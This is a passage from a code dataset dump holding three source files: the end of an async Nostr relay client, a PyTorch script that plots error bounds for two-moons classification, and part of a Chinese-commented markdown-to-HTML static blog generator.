asyncio.create_task(self.monitor_queues(queues, queue))\n return queue\n\n async def unsubscribe(self, sub_id):\n await self.broadcast('unsubscribe', sub_id)\n self.subscriptions[sub_id].cancel()\n del self.subscriptions[sub_id]\n\n async def __aenter__(self):\n await self.connect()\n return self\n\n async def __aexit__(self, ex_type, ex, tb):\n await self.close()\n\n async def get_events(self, *filters, only_stored=True, single_event=False):\n sub_id = secrets.token_hex(4)\n queue = await self.subscribe(sub_id, *filters)\n while True:\n event = await queue.get()\n if event is None:\n if only_stored:\n break\n else:\n yield event\n if single_event:\n break\n await self.unsubscribe(sub_id)\n\n\n","repo_name":"davestgermain/aionostr","sub_path":"aionostr/relay.py","file_name":"relay.py","file_ext":"py","file_size_in_byte":8813,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"22679983121","text":"import argparse\nimport os.path as osp\nimport torch\nfrom util.data import *\nfrom util.general import *\nfrom arch import MLP\nfrom torch.nn import CrossEntropyLoss\nfrom torch import optim\nfrom datetime import datetime\nfrom sys import stdout\nfrom scripts.global_constants import *\n\nfrom util.methods.subfunctions import subfunctions_pre, subfunctions_metric, \\\n bool_tensor_content_hash\nfrom util.two_moons import render_two_moons\nfrom PIL import Image\nfrom matplotlib import cm\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\n\n# This prints the pretty plots.\n\ndef two_moons():\n # ------------------------------------------------------------------------------------------------\n # Arguments\n # ------------------------------------------------------------------------------------------------\n\n config = argparse.ArgumentParser(allow_abbrev=False)\n\n config.add_argument(\"--threshold_divs\", type=int, default=100)\n config.add_argument(\"--data\", type=str, choices=[\"two_moons\"], default=\"two_moons\")\n config.add_argument(\"--data_root\", type=str, default=\"\")\n config.add_argument(\"--batch_size\", type=int, default=256)\n config.add_argument(\"--workers\", type=int, default=1)\n config.add_argument(\"--models_root\", type=str, default=DEFAULT_MODELS_ROOT)\n config.add_argument(\"--seed\", type=int, nargs=\"+\",\n required=True) # to load the corresponding model, and for reproducibility\n config.add_argument(\"--cuda\", default=False, action=\"store_true\")\n config.add_argument(\"--suff\", type=str, default=\"\")\n\n config.add_argument(\"--model\", type=str, default=\"\")\n\n # for this two moons script only\n config.add_argument(\"--two_moons_norm_data\", default=False, action=\"store_true\")\n config.add_argument(\"--radius_mult\", type=float, default=1.5)\n\n subparsers = config.add_subparsers(dest=\"method\")\n\n subfunctions_config = subparsers.add_parser(\"subfunctions\")\n for subconfig in [subfunctions_config]:\n subconfig.add_argument(\"--search_deltas\", type=float, nargs=\"+\",\n default=[0.001, 0.01, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9])\n subconfig.add_argument(\"--search_ps\", type=float, nargs=\"+\",\n default=[1.0, 2.0, 4.0, 6.0, 8.0, 12.0, 16.0, 24.0, 32.0, 48.0, 64.0])\n subconfig.add_argument(\"--precompute\", default=False, action=\"store_true\")\n subconfig.add_argument(\"--precompute_p_i\", type=int, default=-1)\n subconfig.add_argument(\"--pattern_batch_sz\", type=int,\n default=-1) # set to -1 to do whole dataset at once\n\n subconfig.add_argument(\"--no_bound\", default=False, action=\"store_true\")\n subconfig.add_argument(\"--no_log\", default=False, action=\"store_true\")\n subconfig.add_argument(\"--dist_fn\", type=str, default=\"gaussian\", choices=[\"gaussian\"])\n subconfig.add_argument(\"--select_on_AUROC\", default=False, action=\"store_true\")\n\n config = config.parse_args()\n config.test_code_brute_force = False\n print(\"Config: %s\" % config)\n\n set_seed(config.seed[0]) # for reproducibility\n train_loader, val_loader, test_loader = get_data(config, val_pc=0.15, training=False)\n\n model = [\n torch.load(osp.join(config.models_root, \"%s_%d_%s.pytorch\" % (config.data, s, config.model)))[\n \"model\"].eval() for s in config.seed]\n acc = [\n torch.load(osp.join(config.models_root, \"%s_%d_%s.pytorch\" % (config.data, s, config.model)))[\n \"acc\"] for s in config.seed]\n if len(config.seed) == 1:\n config.seed = config.seed[0]\n model = model[0]\n acc = acc[0]\n else:\n raise NotImplementedError\n\n inspect_weights(model)\n\n # make our special val/test set - with much larger stdev, because on regular data it gets 100% acc\n # this is used to pick delta/p\n val_noise = 0.05\n num_val = len(val_loader.dataset)\n x_val, y_val = sk_datasets.make_moons(n_samples=num_val, shuffle=True, noise=val_noise,\n random_state=config.seed)\n x_val, y_val = torch.tensor(x_val, dtype=torch.float), torch.tensor(y_val)\n val_data = [(x_val[i], y_val[i]) for i in range(num_val)]\n\n max_abs = max([tup[0].abs().max() for tup in train_loader.dataset])\n rad = int(np.ceil(max_abs * config.radius_mult)) # some padding, 1.5\n print(\"grid is anchored: [%s, %s]\" % (-rad, rad))\n\n num_test_side = 501 # 101 # evenly sampled across entire surface of grid\n x_test = -rad + 2 * rad * torch.arange(num_test_side,\n dtype=torch.float) / num_test_side # -rad to rad\n x_test_0 = x_test.unsqueeze(0).repeat(num_test_side, 1).unsqueeze(2)\n x_test_1 = x_test.unsqueeze(1).repeat(1, num_test_side).unsqueeze(2)\n x_test = torch.cat([x_test_0, x_test_1], dim=2) # side, side, 2\n x_test = x_test.view(num_test_side ** 2, 2)\n\n x_test_inds = torch.arange(num_test_side, dtype=torch.float)\n x_test_inds_0 = x_test_inds.unsqueeze(0).repeat(num_test_side, 1).unsqueeze(2)\n x_test_inds_1 = x_test_inds.unsqueeze(1).repeat(1, num_test_side).unsqueeze(2)\n x_test_inds = torch.cat([x_test_inds_0, x_test_inds_1], dim=2)\n x_test_inds = x_test_inds.view(num_test_side ** 2, 2)\n\n x_all = torch.cat([x_test, x_test_inds], dim=1)\n assert (x_all.shape == (\n num_test_side ** 2, 4)) # [0, 0] in inds corresponds to [-rad, -rad] in data (coords)\n test_data = [(x_all[i], -1) for i in range(num_test_side ** 2)]\n\n val_loader = torch.utils.data.DataLoader(val_data, batch_size=config.batch_size,\n shuffle=False, num_workers=config.workers,\n pin_memory=True)\n test_loader = torch.utils.data.DataLoader(test_data, batch_size=config.batch_size,\n shuffle=False, num_workers=config.workers,\n pin_memory=True)\n\n # render val\n render_two_moons(config, [val_loader], model_suff=\"\", suff=\"val\")\n\n # Store precomputations\n model, method_variables = globals()[\"%s_pre\" % config.method](config, model, train_loader,\n val_loader)\n\n # Run through test data batches, pass each batch to metric method along with needed params,\n # get metrics back, store with ground truth\n polytope_colours = {}\n polytope_img = np.zeros((num_test_side, num_test_side, 3),\n dtype=np.uint8) # x axis is first dim, as usual. 0,0 = bottom left\n unreliability_img = np.zeros((num_test_side, num_test_side), dtype=np.float)\n for batch_i, (data, targets) in enumerate(test_loader):\n print(\"batch %d / %d, %s\" % (batch_i, len(test_loader), datetime.now()))\n stdout.flush()\n\n inputs = data[:, :2]\n inds = data[:, 2:]\n inputs, targets = inputs.to(device(config.cuda)), targets.to(device(config.cuda))\n\n if config.method == \"subfunctions\":\n unreliability_i, corrects_i, polytopes_i = globals()[\"%s_metric\" % config.method](config,\n method_variables,\n model,\n inputs,\n targets,\n get_polytope_ids=True)\n else:\n raise NotImplementedError\n # unreliability.append(unreliability_i)\n # corrects.append(corrects_i)\n\n for j in range(data.shape[0]):\n polytope_str = bool_tensor_content_hash(polytopes_i[j])\n\n if not polytope_str in polytope_colours:\n polytope_colours[polytope_str] = random_colour()\n assert (inds[j][0] == int(inds[j][0]) and inds[j][1] == int(inds[j][1]))\n\n # flip the axes - x axis is actually second dimension of image!\n polytope_img[int(inds[j][1]), int(inds[j][0]), :] = polytope_colours[polytope_str]\n unreliability_img[int(inds[j][1]), int(inds[j][0])] = unreliability_i[j].item()\n print(\"polytope colours sz: %s\" % len(polytope_colours))\n\n print(\"unreliability range: %s, %s\" % (unreliability_img.max(), unreliability_img.min()))\n\n # unreliability = torch.cat(unreliability)\n # corrects = torch.cat(corrects)\n\n # ------------------------------------------------------------------------------------------------\n # Draw the plots\n # ------------------------------------------------------------------------------------------------\n\n render_space = 1.25\n\n save_prefix = \"%s_%s_%s_%s\" % (config.data, config.seed, config.method, config.suff)\n\n # 1. Original labelled data rendered (2D). Green & purple?\n fig, ax = plt.subplots(1, figsize=(4, 4))\n ax.set_xlim(-rad, rad)\n ax.set_ylim(-rad, rad)\n xs_0 = [train_loader.dataset[j][0][0].item() for j in range(len(train_loader.dataset))]\n xs_1 = [train_loader.dataset[j][0][1].item() for j in range(len(train_loader.dataset))]\n ys = [train_loader.dataset[j][1].item() for j in range(len(train_loader.dataset))]\n colours = [[\"tab:green\", \"tab:purple\"][c] for c in ys]\n ax.scatter(xs_0, xs_1, c=colours)\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_xlabel(\"Input dim 0\", fontsize=14)\n ax.set_ylabel(\"Input dim 1\", fontsize=14)\n fig.tight_layout()\n fig.savefig(osp.join(config.models_root, \"%s.png\" % cleanstr(\"%s_results_0\" % save_prefix)))\n\n # 2. Original labelled data underneath original flat model error - single layer contour plot (3D)\n fig, ax = plt.subplots(1, figsize=(4, 4), subplot_kw={\"projection\": \"3d\"})\n\n xx, yy = np.meshgrid(np.linspace(0, num_test_side - 1, num_test_side),\n np.linspace(0, num_test_side - 1, num_test_side)) # -1 in middle!!\n X = xx\n Y = yy\n whole_model_metric = (1. - acc)\n if not config.no_bound:\n whole_model_metric += torch.sqrt(\n torch.log(2. / method_variables[\"delta\"]) / (2. * method_variables[\"m\"])).item()\n if not config.no_log:\n whole_model_metric = np.log(whole_model_metric)\n\n Z_unreliability = whole_model_metric * np.ones(X.shape)\n\n print(\"whole_model_metric %s\" % whole_model_metric)\n print(\"Z_unreliability %s\" % np.unique(Z_unreliability))\n\n print(\"orig model acc: %s\" % acc)\n ax.plot_surface(X, Y, Z_unreliability, color=\"tab:blue\") #cmap=\"Blues\") # linewidth=0, shade=False\n ax.scatter(rescale(xs_0, rad, num_test_side), rescale(xs_1, rad, num_test_side),\n [Z_unreliability.max() * render_space] * len(xs_0), c=colours)\n ax.set_xticks([])\n ax.set_yticks([])\n # ax.set_zticks([])\n ax.set_xlabel(\"Input dim 0\", labelpad=0, fontsize=14)\n ax.set_ylabel(\"Input dim 1\", labelpad=0, fontsize=14)\n\n if (not config.no_bound) and (not config.no_log):\n # ax.text2D(0.05, 0.95, \"(logscale)\", transform=ax.transAxes)\n ax.set_zlabel(\"true error bound \\n(log)\", labelpad=20, fontsize=12)\n else:\n ax.set_zlabel(\"true error bound\", labelpad=20, fontsize=12)\n\n # ax.tick_params(axis='z', labelrotation=45)\n ax.grid(False)\n # fig.tight_layout()\n # plt.autoscale()\n plt.subplots_adjust(left=0., right=0.8, bottom=0.1, top=0.95) # as pc of full figure size!\n fig.savefig(osp.join(config.models_root, \"%s.png\" % cleanstr(\"%s_results_1\" % save_prefix)))\n\n # 3. Original data rendered with polytope identity (2D).\n # black data dots. polytopes colourful, imshow nearest - origin LOWER\n fig, ax = plt.subplots(1, figsize=(4, 4))\n ax.imshow(polytope_img, origin=\"lower\",\n interpolation=\"antialiased\") # axis from 0 to num_test_side - 1\n\n grey = [\"grey\" for c in ys]\n # ax.scatter(rescale(xs_0, rad, num_test_side), rescale(xs_1, rad, num_test_side), c=grey,\n # alpha=0.01) # no shadow\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_xlabel(\"Input dim 0\", fontsize=14)\n ax.set_ylabel(\"Input dim 1\", fontsize=14)\n fig.tight_layout()\n fig.savefig(osp.join(config.models_root, \"%s.png\" % cleanstr(\"%s_results_2\" % save_prefix)))\n\n # 4. Original labelled data underneat polytope error (3D) - colourful contour plot\n fig, ax = plt.subplots(1, figsize=(4, 4), subplot_kw={\"projection\": \"3d\"})\n plt.grid(b=None)\n\n xx, yy = np.meshgrid(np.linspace(0, num_test_side - 1, num_test_side),\n np.linspace(0, num_test_side - 1, num_test_side))\n X = xx\n Y = yy\n assert (X.shape == unreliability_img.shape)\n\n # unreliability_img = - unreliability_img # invert\n ax.plot_surface(X, Y, unreliability_img, cmap=cm.coolwarm, linewidth=0)\n ax.scatter(rescale(xs_0, rad, num_test_side), rescale(xs_1, rad, num_test_side),\n [-unreliability_img.max() * render_space] * len(xs_0),\n c=colours)\n # Placement 0, 0 would be the bottom left, 1, 1 would be the top right.\n ax.set_xticks([])\n ax.set_yticks([])\n # ax.set_zticks([])\n ax.set_xlabel(\"Input dim 0\", labelpad=0, fontsize=14)\n ax.set_ylabel(\"Input dim 1\", labelpad=0, fontsize=14)\n\n if (not config.no_bound) and (not config.no_log):\n # ax.text2D(0.05, 0.95, \"(logscale)\", transform=ax.transAxes)\n ax.set_zlabel(\"true error bound \\n (log)\", labelpad=20, fontsize=12)\n else:\n ax.set_zlabel(\"true error bound\", labelpad=20, fontsize=12)\n\n ax.grid(False)\n # fig.tight_layout()\n # plt.autoscale()\n plt.subplots_adjust(left=0., right=0.8, bottom=0.1, top=0.95) # as pc of full figure size!\n fig.savefig(osp.join(config.models_root, \"%s.png\" % cleanstr(\"%s_results_3\" % save_prefix)))\n\n # 5. 4 but 2D.\n # print four corners values\n # No shadow!\n\n print(\"corners:\")\n print((unreliability_img[0, 0],\n unreliability_img[0, unreliability_img.shape[1] - 1],\n unreliability_img[unreliability_img.shape[1] - 1, 0],\n unreliability_img[unreliability_img.shape[1] - 1, unreliability_img.shape[1] - 1]))\n\n fig, ax = plt.subplots(1, figsize=(4, 4))\n divider = make_axes_locatable(ax)\n cax = divider.append_axes('right', size='5%', pad=0.05)\n\n # cmap=cm.coolwarm\n im = ax.imshow(unreliability_img, origin=\"lower\",\n interpolation=\"antialiased\") # axis from 0 to num_test_side - 1\n # ax.scatter(rescale(xs_0, rad, num_test_side), rescale(xs_1, rad, num_test_side), c=grey,\n # alpha=0.01)\n cbar = fig.colorbar(im, cax=cax, orientation='vertical')\n\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_xlabel(\"Input dim 0\", fontsize=14)\n ax.set_ylabel(\"Input dim 1\", fontsize=14)\n\n if (not config.no_bound) and (not config.no_log):\n # ax.set_title(\"(logscale)\")\n cbar.ax.set_ylabel(\"true error bound (log)\", rotation=90, labelpad=10, fontsize=14)\n else:\n cbar.ax.set_ylabel(\"true error bound\", rotation=90, labelpad=10, fontsize=14)\n\n fig.tight_layout()\n # plt.autoscale()\n figstr = osp.join(config.models_root, \"%s.png\" % cleanstr(\"%s_results_4\" % save_prefix))\n fig.savefig(figstr)\n\n plt.close(\"all\")\n print(\"Saved to: %s*\" % osp.join(config.models_root, save_prefix))\n\n\ndef rescale(x, rad, num_test_side):\n if isinstance(x, list): x = np.array(x)\n x = (x + rad) / (2 * rad) # [0, 1]\n return x * num_test_side\n\n\nif __name__ == \"__main__\":\n two_moons()\n","repo_name":"xu-ji/subfunctions","sub_path":"scripts/two_moons.py","file_name":"two_moons.py","file_ext":"py","file_size_in_byte":14965,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"16208362358","text":"\"\"\"\r\n*****blog.by\r\n*设计说明\r\n*使用列表存储md文件细节信息\r\n*排序等操作整理列表\r\n*编排导航页面也使用排序后的列表\r\n********************************************使用多线程!************************************\r\n\"\"\"\r\n\r\n\"\"\"\r\n2023.2.1程序更新,换模板\r\n1.post_tem.html => post.html [模板文件]\r\n2.archive_tem.html => page.html [模板文件]\r\n 原首页移到pages目录下。对Create_archive()函数进行了较大幅度修改\r\n 对temp_first 和 temp 值进行了统一,原来首页成了pages目录下面的一个子文件,链接路径也就进行了修改。\r\n3.subtle_set.html未改变。\r\n4.删除了atom.xml文件生成程序,不太使用。\r\n\"\"\"\r\n\r\n\r\nimport os, re, markdown, time, threading\r\n\r\n\"\"\"判断文件夹存在并创建\"\"\"\r\ndef isDIR(DIR):\r\n if ( False == os.path.isdir(DIR) ):\r\n os.mkdir(DIR)\r\n \r\n\"\"\"判断文件存在\"\"\"\r\ndef isFILE(FILE):\r\n if os.path.isfile(FILE):\r\n return True\r\n else:\r\n return False\r\n\r\ndef File_io(_file, Mode, code, DATA=None):\r\n with open(_file, Mode, encoding=code) as file:\r\n if Mode == \"r\":\r\n return file.read() #read 就返回数据\r\n else:\r\n file.write(DATA) #write 操作\r\n file.close()\r\n\r\n\"\"\"存储区段信息的结点 其实吧,也可以使用元组来替代tup(a, b)\"\"\"\r\nclass thread_str(object):\r\n def __init__(self,first, last):\r\n self.first = first\r\n self.last = last\r\n\r\n\"\"\"用于存放数据的结点,搭配列表使用\"\"\"\r\nclass Node(object): \r\n def __init__(self, title=None, date=None, category=None, md_url=None,topping=None, is_archive=None,use_markdownmodule=None,kwds=None, descri=None):\r\n self.title = title #标题\r\n self.date = date #创建时间\r\n self.category = category #类别\r\n self.md_url = md_url #makdown文章地址\r\n self.topping = topping #置顶\r\n self.is_archive = is_archive #archive页收录\r\n self.use_markdownmodule = use_markdownmodule #启用markdown库\r\n self.keywords = kwds #文章关键词 \r\n self.description = descri #文章摘要\r\n\r\nclass md2html(object):\r\n dir_public = None\r\n dir_posts = None\r\n dir_pages = None\r\n dir_extra = None\r\n pages = 0 #页数\r\n articleMax = 30 #设置每页文章数,默认值30\r\n post_num = 0 #文章数量\r\n is_only2page = False #一开始只有两页的判断\r\n template_post = None #文章模板\r\n template_acrchive = None #archive页模板 \r\n archlink_Detail = None #archive页文章链接处细节模板\r\n page_nav_l = None #各个pages里面prev next按钮\r\n page_nav_r = None \r\n #menu = None #菜单设置\r\n md_rawlist = list() #原始Md文件地址存储 \r\n thread_srtarr = list() #线程存储列表\r\n \r\n def __init__(self, base, site_name, site_UL, max_article=None, output_ALL=None, output_DETAIL=None, output_PAGE=None, output_RECENTPOSTS=None):\r\n md2html.dir_public = output_ALL\r\n md2html.dir_posts = output_DETAIL\r\n md2html.dir_pages = output_PAGE\r\n md2html.dir_extra = output_RECENTPOSTS\r\n self.base = base\r\n self.site_name = site_name\r\n self.site_url = site_UL\r\n self.arr = list() #列表,按照读取文件顺序存储文档信息,建立一种索引关系。\r\n if max_article != None:\r\n md2html.articleMax = max_article\r\n \r\n def __del__(self):\r\n print(\"程序结束, Good bye !\")\r\n\r\n \"\"\"遍历source源文件,寻址,插入列表中\"\"\"\r\n def findALLFile(self):\r\n for root, ds, fs in os.walk(self.base):\r\n for f in fs:\r\n md_l = os.path.join(root, f) \r\n parent_dir = os.path.dirname(md_l).replace(self.base, \"{}/{}\".format(self.dir_public, self.dir_posts) )\r\n isDIR( parent_dir )\r\n md2html.md_rawlist.append(md_l)\r\n \r\n \"\"\"根据原始文件地址读取文件,得出需要的细节信息\"\"\"\r\n def GetmdDetail(self, addrid): \r\n md_addr = self.md_rawlist[addrid]\r\n if md_addr != None: #传递的不是空地址\r\n try:\r\n raw_Data = File_io(md_addr, \"r\", \"utf-8\")\r\n except:\r\n print(\"文件地址不对!\")\r\n return None\r\n title = None\r\n date = None\r\n category = None\r\n private = None\r\n top = None\r\n is_archive = None\r\n use_markdownmodule = None\r\n keywords = None\r\n description = None\r\n \r\n DATA = raw_Data[:400]\r\n title_p = re.search(\"title:(.*?)\\n\", DATA)\r\n date_p = re.search(\"date:(.*?)\\n\", DATA)\r\n category_p = re.search(\"category:(.*?)\\n\", DATA)\r\n private_p = re.search(\"priv:(.*?)\\n\", DATA)\r\n top_p = re.search(\"top:(.*?)\\n\", DATA)\r\n is_archive_p = re.search(\"is_archive:(.*?)\\n\", DATA)\r\n use_markdownmodule_p = re.search(\"use_markdownmodule:(.*?)\\n\", DATA)\r\n keywords_p = re.search(\"keywords:(.*?)\\n\", DATA)\r\n description_p = re.search(\"description:(.*?)\\n\", DATA)\r\n \r\n \"\"\"title\"\"\"\r\n if title_p != None: #设置了该属性\r\n title = title_p.group(1).replace(\" \", \"\")\r\n else:\r\n title = \"无标题\"\r\n if title == \"\":\r\n title = \"无标题\"\r\n \"\"\"date\"\"\"\r\n if date_p != None:\r\n date = date_p.group(1)\r\n else:\r\n date = \"1997-01-01 19:12:00\"\r\n if date == \"\":\r\n date = \"1997-01-01 19:12:00\"\r\n \"\"\"category\"\"\"\r\n if category_p != None:\r\n category = category_p.group(1).replace(\" \", \"\")\r\n else:\r\n category = \"life\"\r\n if category == \"\":\r\n category = \"life\"\r\n \"\"\"private\"\"\"\r\n if private_p != None:\r\n private = private_p.group(1).replace(\" \", \"\")\r\n else:\r\n private = \"No\"\r\n if private == \"\":\r\n private = \"No\"\r\n \"\"\"top\"\"\"\r\n if top_p != None:\r\n top = top_p.group(1).replace(\" \", \"\")\r\n else:\r\n top = \"No\"\r\n if top == \"\":\r\n top = \"No\"\r\n \"\"\"is_archive\"\"\"\r\n if is_archive_p != None:\r\n is_archive = is_archive_p.group(1).replace(\" \", \"\")\r\n else:\r\n is_archive = \"Yes\"\r\n if is_archive == \"\":\r\n is_archive = \"Yes\"\r\n \"\"\"use_markdownmodule\"\"\"\r\n if use_markdownmodule_p != None:\r\n use_markdownmodule = use_markdownmodule_p.group(1)\r\n else:\r\n use_markdownmodule = \"Yes\"\r\n if use_markdownmodule == \"\":\r\n use_markdownmodule = \"Yes\"\r\n \"\"\"keywords\"\"\"\r\n if keywords_p != None:\r\n keywords = keywords_p.group(1).replace(\" \", \"\")\r\n else:\r\n keywords = \"{},{},{}\".format(title, self.site_name,category)\r\n if keywords == \"\":\r\n keywords = \"{},{},{}\".format(title, self.site_name,category)\r\n \"\"\"description\"\"\"\r\n if description_p != None:\r\n description = description_p.group(1).replace(\" \", \"\")\r\n else:\r\n description = \"{}:{}\".format(self.site_name, title)\r\n if description == \"\":\r\n description = \"{}:{}\".format(self.site_name, title)\r\n \r\n \r\n if( private != \"Yes\"):\r\n self.arr.append(Node( title, date, category, md_addr, top, is_archive, use_markdownmodule, keywords, description ))\r\n else:\r\n print(\"文章:《%s》保密%s,不生成HTML,地址为:%s\\n\"%(title, private, md_addr) ) \r\n \r\n return True\r\n else:\r\n return False\r\n \r\n \"\"\"通过md文件地址得到html文件地址\"\"\"\r\n def HTML_url(self, md_addr, parse_to_HTML=None):\r\n if parse_to_HTML == True:\r\n a = \"{}/\".format(self.base) #source\\ #linux系统为\"/\" windows系统为\"\\\"\r\n return md_addr.replace(a, \"/{}/\".format(self.dir_posts) ).replace(\".md\", \".html\") # source\\...md => /posts/...html\r\n else:\r\n return md_addr.replace(self.base, self.dir_posts).replace(\"\\\\\", \"/\").replace(\".md\", \".html\") # source/...md => posts/...html\r\n \r\n \"\"\"转为HTML\"\"\"\r\n def parse_to_HTML(self, listNumber, str):\r\n out_path = self.HTML_url('{}/{}'.format(self.dir_public, self.arr[listNumber].md_url) ) #输出地址及HTML文件名称结构\r\n \r\n \"\"\"判断需要的网页是否存在,存在就不输出,并且要排除前3篇文章。\"\"\"\r\n if os.path.isfile( out_path ) and listNumber >=3:\r\n return None\r\n \r\n raw_Data = File_io(self.arr[listNumber].md_url, \"r\", \"utf-8\") \r\n \r\n if self.arr[listNumber].use_markdownmodule == \"Yes\":\r\n html_content = markdown.markdown( raw_Data, extensions=[\"markdown.extensions.toc\", \"markdown.extensions.tables\", \"markdown.extensions.fenced_code\", \"markdown.extensions.meta\"] )\r\n else:\r\n html_content = raw_Data\r\n \r\n prev_article = None # 时间距离最远的文章为 上一篇 列表序号最大处方向\r\n next_article = None # 时间距离最近的文章为 下一篇 列表序号为0处方向\r\n \r\n \"\"\"通过标签is_archive判断是否应当编排页内的上下页导航,通过下面的操作以其达到半隐藏的目的\"\"\"\r\n if \"No\" == self.arr[listNumber].is_archive:\r\n prev_article = \"\"\r\n next_article = \"\"\r\n else:\r\n if(0 == listNumber):\r\n next_article = \"下一篇:没有了\"\r\n else:\r\n n = listNumber-1\r\n while ( (\"No\" == self.arr[n].is_archive) and ( n > 0) ): \r\n n -= 1\r\n if -1 == n:\r\n next_article = \"下一篇:没有了\"\r\n else:\r\n \"\"\"下一篇\"\"\"\r\n next_article = '下一篇:'+self.arr[n].title+'' \r\n \r\n if(self.post_num-1 == listNumber):\r\n prev_article = \"上一篇:没有了\"\r\n else:\r\n m = listNumber +1\r\n while ( (\"No\"==self.arr[m].is_archive) and ( m < (self.post_num-1) ) ):\r\n m += 1\r\n if self.post_num == m:\r\n prev_article = \"上一篇:没有了\"\r\n else:\r\n \"\"\"上一篇\"\"\"\r\n prev_article = '上一篇:'+self.arr[m].title+'' \r\n \r\n post_html_content = self.template_post.replace('{{title}}', self.arr[listNumber].title)\\\r\n .replace('{{site-name}}',self.site_name)\\\r\n .replace('{{date}}', self.arr[listNumber].date)\\\r\n .replace('{{post-content}}', html_content)\\\r\n .replace('{{category}}', self.arr[listNumber].category)\\\r\n .replace('{{prev_article}}',prev_article)\\\r\n .replace('{{next_article}}',next_article)\\\r\n .replace('{{keywords}}', self.arr[listNumber].keywords)\\\r\n .replace('{{description}}',self.arr[listNumber].description)\r\n #.replace(\"{{menu}}\", self.menu)\r\n File_io(out_path, \"w\", \"utf-8\", DATA=post_html_content)\r\n print('使用线程%s生成文章:《%s》,其标签为:%s,地址在:%s'%(str, self.arr[listNumber].title, self.arr[listNumber].category, out_path))\r\n \r\n \"\"\"生成目录,定制的,没有办法通用\"\"\"\r\n def Create_archive(self):\r\n print('生成目录中')\r\n temp = self.archlink_Detail[0]\r\n #temp_first = self.archlink_Detail[1]\r\n temp_first = temp\r\n page_nav_l = self.page_nav_l\r\n page_nav_r = self.page_nav_r\r\n posts_url = None\r\n if (self.post_num <= self.articleMax): #只有一页 a\r\n print(\"a\")\r\n s1 = ''\r\n for i in range(0, self.post_num): \r\n if self.arr[i].is_archive == \"Yes\":\r\n a = temp_first.replace('{{date}}',self.arr[i].date.replace(\" \", \"\")[0:10])\\\r\n .replace('{{md_url}}',self.HTML_url(self.arr[i].md_url))\\\r\n .replace('{{post_name}}',self.arr[i].title) \r\n s1 = s1+\"\\n\\t\\t\"+a\r\n posts_url = \"{}/{}/index.html\".format(self.dir_public,self.dir_pages)\r\n File_io(posts_url, \"w\", \"utf-8\", \\\r\n DATA=self.template_acrchive.replace('{{page_nav}}',s1)\\\r\n .replace('{{title}}',self.site_name)\\\r\n .replace('{{site-name}}',self.site_name)\\\r\n .replace('{{nav}}','') \\\r\n #.replace(\"{{menu}}\", self.menu) \r\n )\r\n self.sitemap(posts_url, Mode=\"a\")\r\n elif(self.pages == 1): #第一页没有pre b\r\n print(\"b\")\r\n s1 = ''\r\n for i in range(0, self.articleMax): \r\n if self.arr[i].is_archive == \"Yes\":\r\n a = temp_first.replace('{{date}}',self.arr[i].date.replace(\" \", \"\")[0:10])\\\r\n .replace('{{md_url}}',self.HTML_url(self.arr[i].md_url))\\\r\n .replace('{{post_name}}',self.arr[i].title) \r\n s1 = s1+\"\\n\\t\\t\"+a\r\n posts_url = \"{}/{}/index.html\".format(self.dir_public,self.dir_pages)\r\n File_io(posts_url, \"w\", \"utf-8\",\\\r\n DATA = self.template_acrchive.replace('{{page_nav}}',s1)\\\r\n .replace('{{title}}',self.site_name)\\\r\n .replace('{{site-name}}',self.site_name)\\\r\n .replace('{{nav}}',page_nav_r.replace('{{right-link}}','{}.html'.format( self.pages+1 ) ) )\\\r\n #.replace('{{nav}}',page_nav_r.replace('{{right-link}}','{}/{}.html'.format( self.dir_pages,str(self.pages+1) ) ) )\\\r\n #.replace(\"{{menu}}\", self.menu) \\\r\n )\r\n self.sitemap(posts_url,Mode=\"a\")\r\n elif(self.pages == 2 and (self.is_only2page == False) ): #由递归衰减而到的第2页 c\r\n print(\"c\")\r\n s1 = ''\r\n for i in range(self.articleMax, self.pages*self.articleMax): \r\n if self.arr[i].is_archive == \"Yes\":\r\n a = temp.replace('{{date}}',self.arr[i].date.replace(\" \", \"\")[0:10])\\\r\n .replace('{{md_url}}',self.HTML_url(self.arr[i].md_url))\\\r\n .replace('{{post_name}}',self.arr[i].title) \r\n s1 = s1+\"\\n\\t\\t\"+a\r\n posts_url = '{}/{}/{}.html'.format(self.dir_public, self.dir_pages, self.pages)\r\n File_io(posts_url, \"w\", \"utf-8\", \\\r\n DATA = self.template_acrchive.replace('{{page_nav}}',s1)\\\r\n .replace('{{title}}',\"第{}页|{}\".format(str(self.pages), self.site_name) )\\\r\n .replace('{{site-name}}',self.site_name)\\\r\n .replace('{{nav}}', page_nav_l.replace('{{left-link}}','index.html')+page_nav_r.replace('{{right-link}}',str(self.pages+1)+'.html'))\\\r\n #.replace(\"{{menu}}\", self.menu) \r\n )\r\n self.sitemap(posts_url,Mode=\"a\") \r\n elif(self.is_only2page): #如果一开始就是只有2页便执行如下代码 d\r\n print(\"d\")\r\n s1 = ''\r\n for i in range(self.articleMax, self.post_num): \r\n if self.arr[i].is_archive == \"Yes\": \r\n a = temp.replace('{{date}}',self.arr[i].date.replace(\" \", \"\")[0:10])\\\r\n .replace('{{md_url}}',self.HTML_url(self.arr[i].md_url))\\\r\n .replace('{{post_name}}',self.arr[i].title) \r\n s1 = s1+\"\\n\\t\\t\"+a\r\n posts_url = '{}/{}/{}.html'.format(self.dir_public, self.dir_pages, self.pages)\r\n File_io(posts_url, \"w\", \"utf-8\",\\\r\n DATA = self.template_acrchive.replace('{{page_nav}}',s1)\\\r\n .replace('{{title}}',\"第{}页|{}\".format(str(self.pages), self.site_name) )\\\r\n .replace('{{site-name}}',self.site_name)\\\r\n .replace('{{nav}}', page_nav_l.replace('{{left-link}}','index.html'))\\\r\n #.replace(\"{{menu}}\", self.menu) \\\r\n ) \r\n self.sitemap(posts_url, Mode=\"a\")\r\n elif(self.pages*self.articleMax >= self.post_num and ((self.pages-1)*self.articleMax <= self.post_num ) ): #最后一页 e\r\n print(\"e\")\r\n s1 = '' \r\n for i in range((self.pages-1)*self.articleMax, self.post_num):\r\n if self.arr[i].is_archive == \"Yes\":\r\n a = temp.replace('{{date}}',self.arr[i].date.replace(\" \", \"\")[0:10])\\\r\n .replace('{{md_url}}',self.HTML_url(self.arr[i].md_url))\\\r\n 